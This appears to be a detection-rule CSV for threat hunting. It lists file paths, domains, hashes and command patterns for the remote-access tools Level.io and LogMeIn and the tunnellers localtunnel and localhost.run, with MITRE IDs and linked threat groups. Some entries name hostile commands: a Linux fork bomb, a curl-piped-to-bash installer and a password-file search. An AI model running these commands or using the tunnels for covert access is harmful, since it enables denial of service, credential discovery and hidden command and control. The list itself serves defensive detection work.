"*/var/lib/level/level.db*",".{0,1000}\/var\/lib\/level\/level\.db.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/var/lib/level/level.log*",".{0,1000}\/var\/lib\/level\/level\.log.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\level.exe*--check-service*",".{0,1000}\\level\.exe.{0,1000}\-\-check\-service.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\level-remote-control-ffmpeg.exe.download*",".{0,1000}\\level\-remote\-control\-ffmpeg\.exe\.download.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\level-windows-amd64.exe*",".{0,1000}\\level\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\level-windows-arm64.exe*",".{0,1000}\\level\-windows\-arm64\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files (x86)\Level\*",".{0,1000}\\Program\sFiles\s\(x86\)\\Level\\.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Level\level.db*",".{0,1000}\\Program\sFiles\\Level\\level\.db.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Level\osqueryi.exe*",".{0,1000}\\Program\sFiles\\Level\\osqueryi\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Level\winpty.dll*",".{0,1000}\\Program\sFiles\\Level\\winpty\.dll.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Level\winpty-agent.exe*",".{0,1000}\\Program\sFiles\\Level\\winpty\-agent\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Temp\install_windows.exe*",".{0,1000}\\Temp\\install_windows\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*<\Level\Level Watchdog>*",".{0,1000}\<\\Level\\Level\sWatchdog\>.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Level Software, Inc.<*",".{0,1000}\>Level\sSoftware,\sInc\.\<.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*>Remote device management - https://level.io<*",".{0,1000}\>Remote\sdevice\smanagement\s\-\shttps\:\/\/level\.io\<.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*37B9B43761672219E98BFA826E7AF17E799592BC57ACBC4AAC38DAF5EFAAF653*",".{0,1000}37B9B43761672219E98BFA826E7AF17E799592BC57ACBC4AAC38DAF5EFAAF653.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*3DDF7FBB35EC90BCF15E723F1445EEB71E71C9757243EFEC1CEB4E74A10A1D9F*",".{0,1000}3DDF7FBB35EC90BCF15E723F1445EEB71E71C9757243EFEC1CEB4E74A10A1D9F.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A"
"*agents.level.io*",".{0,1000}agents\.level\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*builds.level.io*",".{0,1000}builds\.level\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://app.level.io/devices*",".{0,1000}https\:\/\/app\.level\.io\/devices.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://docs.level.io/1.0/admin-guides/level-watchdog-task*",".{0,1000}https\:\/\/docs\.level\.io\/1\.0\/admin\-guides\/level\-watchdog\-task.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://downloads.level.io/install_linux.sh*",".{0,1000}https\:\/\/downloads\.level\.io\/install_linux\.sh.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://downloads.level.io/install_mac_os.sh*",".{0,1000}https\:\/\/downloads\.level\.io\/install_mac_os\.sh.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://downloads.level.io/install_windows.exe*",".{0,1000}https\:\/\/downloads\.level\.io\/install_windows\.exe.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://downloads.level.io/stable/level-linux-amd64*",".{0,1000}https\:\/\/downloads\.level\.io\/stable\/level\-linux\-amd64.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*LEVEL_API_KEY=* bash -c ""$(curl -L *",".{0,1000}LEVEL_API_KEY\=.{0,1000}\sbash\s\-c\s\""\$\(curl\s\-L\s.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*logs.logdna.com*",".{0,1000}logs\.logdna\.com.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*netsh  advfirewall firewall add rule name=\""Level Agent\""*",".{0,1000}netsh\s\sadvfirewall\sfirewall\sadd\srule\sname\=\\\""Level\sAgent\\\"".{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*online.level.io*",".{0,1000}online\.level\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Program Files\Level\level.log*",".{0,1000}Program\sFiles\\Level\\level\.log.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*realtime.ably.io*",".{0,1000}realtime\.ably\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*rest.ably.io*",".{0,1000}rest\.ably\.io.{0,1000}","greyware_tool_keyword","level.io","Level is reinventing remote monitoring and management","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","Scattered Spider*","RMM","https://level.io/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*:(){:I: &I*",".{0,1000}\:\(\)\{\:I\:\s\&I.{0,1000}","greyware_tool_keyword","linux","fork bomb linux - denial-of-service attack wherein a process continually replicates itself to deplete available system resources slowing down or crashing the system due to resource starvation","T1499","TA0040","N/A","N/A","Exploitation tool","https://github.com/RoseSecurity/Red-Teaming-TTPs","1","0","N/A","N/A","10","10","1237","155","2024-08-26T19:30:51Z","2021-08-16T17:34:25Z"
"*http://*.localhost.run*",".{0,1000}http\:\/\/.{0,1000}\.localhost\.run.{0,1000}","greyware_tool_keyword","localhost.run","Put a locally running HTTP HTTPS or TLS app on the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://localhost.run/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*https://*.localhost.run*",".{0,1000}https\:\/\/.{0,1000}\.localhost\.run.{0,1000}","greyware_tool_keyword","localhost.run","Put a locally running HTTP HTTPS or TLS app on the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://localhost.run/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ssh * .localhost.run*",".{0,1000}ssh\s.{0,1000}\s\.localhost\.run.{0,1000}","greyware_tool_keyword","localhost.run","Put a locally running HTTP HTTPS or TLS app on the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://localhost.run/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*ssh * localhost.run*",".{0,1000}ssh\s.{0,1000}\slocalhost\.run.{0,1000}","greyware_tool_keyword","localhost.run","Put a locally running HTTP HTTPS or TLS app on the internet","T1102 - T1071 - T1560.001","TA0011 - TA0042","N/A","N/A","C2","https://localhost.run/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* --name localtunnel *",".{0,1000}\s\-\-name\slocaltunnel\s.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","0","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*.localltunnel.me*",".{0,1000}\.localltunnel\.me.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","1","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z"
"*/go-localtunnel.git*",".{0,1000}\/go\-localtunnel\.git.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*/gotunnelme.git*",".{0,1000}\/gotunnelme\.git.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*/localtunnel.git*",".{0,1000}\/localtunnel\.git.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","1","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z"
"*/localtunnel.js*",".{0,1000}\/localtunnel\.js.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","1","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z"
"*d0274f036468ef236d3a526bb6235289bdbe4c8828ee7feee1829a026f5f3bec*",".{0,1000}d0274f036468ef236d3a526bb6235289bdbe4c8828ee7feee1829a026f5f3bec.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","0","#filehash","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*e367bbc84b75901ae680472b7b848ee4f10fbc356e7dd8de5c2c46000cf78818*",".{0,1000}e367bbc84b75901ae680472b7b848ee4f10fbc356e7dd8de5c2c46000cf78818.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","0","#filehash","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z"
"*gotunnelme *",".{0,1000}gotunnelme\s.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","0","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*https://localtunnel.me*",".{0,1000}https\:\/\/localtunnel\.me.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","1","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z"
"*install -g localtunnel*",".{0,1000}install\s\-g\slocaltunnel.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","0","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z"
"*localtunnel/go-localtunnel*",".{0,1000}localtunnel\/go\-localtunnel.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*localtunnel/server.git*",".{0,1000}localtunnel\/server\.git.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*localtunnel-server:latest*",".{0,1000}localtunnel\-server\:latest.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*NoahShen/gotunnelme*",".{0,1000}NoahShen\/gotunnelme.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*npx localtunnel *",".{0,1000}npx\slocaltunnel\s.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","0","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z"
"*src/gotunnelme/*",".{0,1000}src\/gotunnelme\/.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/NoahShen/gotunnelme","1","1","N/A","N/A","10","10","166","45","2018-01-06T04:41:15Z","2013-10-18T02:46:51Z"
"*yarn add localtunnel*",".{0,1000}yarn\sadd\slocaltunnel.{0,1000}","greyware_tool_keyword","localtunnel","localtunnel exposes your localhost to the world","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/localtunnel/localtunnel","1","0","N/A","N/A","10","10","18814","1320","2024-03-20T17:04:54Z","2012-06-18T02:33:30Z"
"*locate password | more*",".{0,1000}locate\spassword\s\|\smore.{0,1000}","greyware_tool_keyword","locate","Find sensitive files","T1083 - T1213.002 - T1005","TA0007 - TA0010","N/A","N/A","discovery","N/A","1","0","N/A","greyware_tools high risks of false positives","6","4","N/A","N/A","N/A","N/A"
"*.console.gotoassist.com*",".{0,1000}\.console\.gotoassist\.com.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*.remoteview.logmein.com*",".{0,1000}\.remoteview\.logmein\.com.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/LMI_Rescue.exe*",".{0,1000}\/LMI_Rescue\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/LMIRTechConsole.exe*",".{0,1000}\/LMIRTechConsole\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\*\rescue.log*",".{0,1000}\\AppData\\Local\\.{0,1000}\\rescue\.log.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\LMIR*.tmp.bat*",".{0,1000}\\AppData\\Local\\LMIR.{0,1000}\.tmp\.bat.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\Local\LogMeIn Rescue Applet\*",".{0,1000}\\AppData\\Local\\LogMeIn\sRescue\sApplet\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\AppData\LocalLow\LogMeIn Rescue\*",".{0,1000}\\AppData\\LocalLow\\LogMeIn\sRescue\\.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMI_Rescue.exe*",".{0,1000}\\LMI_Rescue\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\lmi_rescue_srv.exe*",".{0,1000}\\lmi_rescue_srv\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMIGuardianEvt.dll*",".{0,1000}\\LMIGuardianEvt\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMIR*.tmp\rarcc.dll*",".{0,1000}\\LMIR.{0,1000}\.tmp\\rarcc\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMIRescue-*.clog*",".{0,1000}\\LMIRescue\-.{0,1000}\.clog.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMIRescue-*.connlog*",".{0,1000}\\LMIRescue\-.{0,1000}\.connlog.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMIRescueCOL.log*",".{0,1000}\\LMIRescueCOL\.log.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMIRescueMqttMessages_*.dat*",".{0,1000}\\LMIRescueMqttMessages_.{0,1000}\.dat.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMIRescueUpdater.log*",".{0,1000}\\LMIRescueUpdater\.log.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\LMIRhook.000.dll*",".{0,1000}\\LMIRhook\.000\.dll.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\lmirtechconsole.exe*",".{0,1000}\\lmirtechconsole\.exe.{0,1000}","greyware_tool_keyword","LogMeIn","LogMeIn is a legitimate remote support software that allows IT and customer support teams to remotely access and control devices to provide support - abused by threat actors ","T1021 - T1071 - T1090","TA0003 - TA0008 - TA0011","N/A","BlackSuit - Royal - Trigona - Yanluowang","RMM","https://www.logmein.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
